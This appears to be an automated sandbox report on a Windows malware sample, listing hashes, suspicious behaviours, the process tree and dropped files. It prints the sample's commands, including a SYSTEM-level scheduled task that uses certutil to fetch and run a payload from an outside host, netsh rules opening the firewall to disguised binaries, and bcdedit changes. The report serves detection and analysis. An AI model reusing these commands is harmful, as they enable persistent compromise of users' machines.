Analysis
-
max time kernel
21s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
24-05-2022 00:41
Static task
static1
Behavioral task
behavioral1
Sample
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
Resource
win10v2004-20220414-en
General
-
Target
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe
-
Size
3.9MB
-
MD5
f0ba0b617c4f6be9bb0091003dd55a18
-
SHA1
dcc4ecfc0016ae1a649929f29ae87eaae1fac9a7
-
SHA256
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf
-
SHA512
9ebefffdf4bc6aa73e03dcb105ad327b170dbbb03746e43f4ce59571f19c27b5ee722dfaa7bc384b90cfd44648bb2550c2beb29be71ab649c7564e10cdb9a8ff
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2720 created 2116 2720 svchost.exe 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe -
Modifies Windows Firewall 1 TTPs
-
Modifies boot configuration data using bcdedit 1 IoCs
Processes:
bcdedit.exepid process 4356 bcdedit.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1964 schtasks.exe 4168 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exepid process 2116 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe 2116 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe 2228 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe 2228 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exesvchost.exedescription pid process Token: SeDebugPrivilege 2116 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe Token: SeImpersonatePrivilege 2116 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe Token: SeTcbPrivilege 2720 svchost.exe Token: SeTcbPrivilege 2720 svchost.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
svchost.exe2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.execmd.exedescription pid process target process PID 2720 wrote to memory of 2228 2720 svchost.exe 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe PID 2720 wrote to memory of 2228 2720 svchost.exe 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe PID 2720 wrote to memory of 2228 2720 svchost.exe 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe PID 2228 wrote to memory of 4372 2228 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe cmd.exe PID 2228 wrote to memory of 4372 2228 2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe cmd.exe PID 4372 wrote to memory of 668 4372 cmd.exe netsh.exe PID 4372 wrote to memory of 668 4372 cmd.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"C:\Users\Admin\AppData\Local\Temp\2e5280f5bd57205a3f4034a1bbe8b0ae697f2a68fb77775dc33c18b78628efdf.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes"3⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe ""3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F4⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v4⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"4⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\83876a664c4b\83876a664c4b\83876a664c4b.exe" enable=yes1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
C:\Windows\rss\csrss.exeFilesize
2.1MB
MD58cb4593803c40d617a7d63135506062b
SHA1d45d21ca9fa8433f6b0621db7a582e1d86f85d0e
SHA256746a3143a3f79a95d088362ef9e7697418f739b0977ffdca6dc7f33ff2ec3e74
SHA512e7ab7741c423ee30e6ad8624f3335e7226b5565a2315a8776cbe3a269a92306747a6a3b8e38ac02c0a87198f796a4f915d053125d17381969249025a1283e200
-
C:\Windows\rss\csrss.exeFilesize
2.1MB
MD5b700c94525338822f970874d9a780d7c
SHA177ddc4f07987f7d61c50f4e79b750509fbc42fd4
SHA2563ed0f7c20887eaed1cc5555c7cf14d903d6d84e74d6bf2ce61491be2d872d548
SHA512b7f37837f37935b67cfb841c92a291f64a0e1ae6bf71cd2626ce9c564f69aaa421d48ad0874cd1a8c5dc70ebaf7ad9887167096a92f9f5f0b1897fd2e8c1009e
-
memory/668-137-0x0000000000000000-mapping.dmp
-
memory/1964-146-0x0000000000000000-mapping.dmp
-
memory/2116-131-0x0000000001510000-0x0000000001C05000-memory.dmpFilesize
7.0MB
-
memory/2116-132-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB
-
memory/2116-130-0x000000000115E000-0x0000000001504000-memory.dmpFilesize
3.6MB
-
memory/2228-135-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB
-
memory/2228-134-0x0000000001361000-0x0000000001707000-memory.dmpFilesize
3.6MB
-
memory/2228-133-0x0000000000000000-mapping.dmp
-
memory/2632-138-0x0000000000000000-mapping.dmp
-
memory/2780-147-0x0000000000000000-mapping.dmp
-
memory/3176-139-0x0000000000000000-mapping.dmp
-
memory/4168-145-0x0000000000000000-mapping.dmp
-
memory/4356-149-0x0000000000000000-mapping.dmp
-
memory/4372-136-0x0000000000000000-mapping.dmp
-
memory/4584-140-0x0000000000000000-mapping.dmp
-
memory/4584-143-0x0000000001500000-0x00000000018A6000-memory.dmpFilesize
3.6MB
-
memory/4584-144-0x0000000000400000-0x0000000000B10000-memory.dmpFilesize
7.1MB